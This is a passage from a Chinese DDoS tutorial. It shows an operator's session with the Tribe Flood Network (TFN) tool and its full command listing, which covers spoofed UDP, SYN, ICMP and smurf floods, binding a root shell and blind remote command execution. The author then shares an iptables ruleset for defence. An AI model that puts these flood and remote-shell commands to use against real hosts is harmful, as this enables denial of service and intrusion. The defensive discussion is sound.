0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................
[root@master root]./tfn -f host.txt -c 0 停止攻击
Protocol : random
Source IP : random
Client input : list
Command : stop flooding
Password verification:
Sending out packets: ...
当然还有别的攻击方法,你只要用-c X就可以更改攻击方法.
[root@master root]./tfn
usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host/ip] Specify your source IP. Randomly spoofed by default, you need
to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options/targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<-c command ID> 0 - Halt all current floods on server(s) immediately
1 - Change IP antispoof-level (evade rfc2267 filtering)
usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
2 - Change Packet size, usage: -i
3 - Bind root shell to a port, usage: -i
4 - UDP flood, usage: -i victim@victim2@victim3@...
5 - TCP/SYN flood, usage: -i victim@... [-p destination port]
6 - ICMP/PING flood, usage: -i victim@...
7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...
8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...
9 - TARGA3 flood (IP stack penetration), usage: -i victim@...
10 - Blindly execute remote shell command, usage -i command
四.防守办法
就如同网上所有介绍DDOS的文章一样,DDOS防不胜防,我试着用防火墙过滤掉所有icmp包,来保护我的主机,但所实现的,只是我的主机晚点儿崩溃而已.哎~,别指望我来防DDOS,要能防,我也不用不睡觉啊:(
还是那句老话,我们能做的,就是尽量让我们的主机不成为别人攻击的代理,并对intranet 内出行的包进行严格限制,尽量不去危害别人,只要大家都这样做,我们的网络环境才可以安全一些,至少,我可以安心睡几天觉.
附上我防火墙的一部分.主要是针对ICMP/PING的,不过用处不太大:(
/sbin/iptables -P INPUT DROP
/sbin/iptables -A INPUT -i lo -p all -j ACCEPT
/sbin/iptables -A INPUT -i eth1 -p icmp -j ACCEPT
/sbin/iptables -A INPUT -p icmp --icmp-type 8 -j DROP
/sbin/iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT
/sbin/iptables -A INPUT -s 127.0.0.2 -i eth0 -j DROP
/sbin/iptables -A INPUT -s $LAN_NET/24 -i eth0 -j DROP
/sbin/iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP
/sbin/iptables -A INPUT -s 10.0.0.0/8 -i eth0 -j DROP
/sbin/iptables -A INPUT -i eth0 -m limit --limit 1/sec \
--limit-burst 5 -j ACCEPT/sbin/iptables -A INPUT \
-i eth0 -p udp -m state --state NEW -j REJECT
/sbin/iptables -A INPUT -p tcp --dport 22 -j ACCEPT
/sbin/iptables -A INPUT -p tcp --dport 80 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT
/sbin/iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i eth0 -m state \
--state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT
/sbin/iptables -A INPUT -p udp -i eth0 -m state \
--state ESTABLISHED,RELATED -m udp --dport 1024: -j ACCEPT
/sbin/iptables -A INPUT -p icmp --icmp-type echo-request \
-j LOG --log-level 2
/sbin/iptables -A INPUT -i eth0 -p icmp --icmp-type \
echo-request -j DROP
/sbin/iptables -A INPUT -p tcp -m multiport \
--destination-port 135,137,138,139 -j LOG
/sbin/iptables -A INPUT -p udp -m multiport \
--destination-port 135,137,138,139 -j LOG
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i eth1 -m state --state \
ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT
以上只是我个人的一些摸索经验,不足或错误之处,还望指证。如果您可以防止DDOS,也请告诉我:)因为本文内容的特殊性,转载请通知我,谢谢合作:)
并对帮助过我制定防火墙的sevenJ表示感谢!
wjpfjy
mail:wjpfjy@sohu.com
QQ: 928395
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
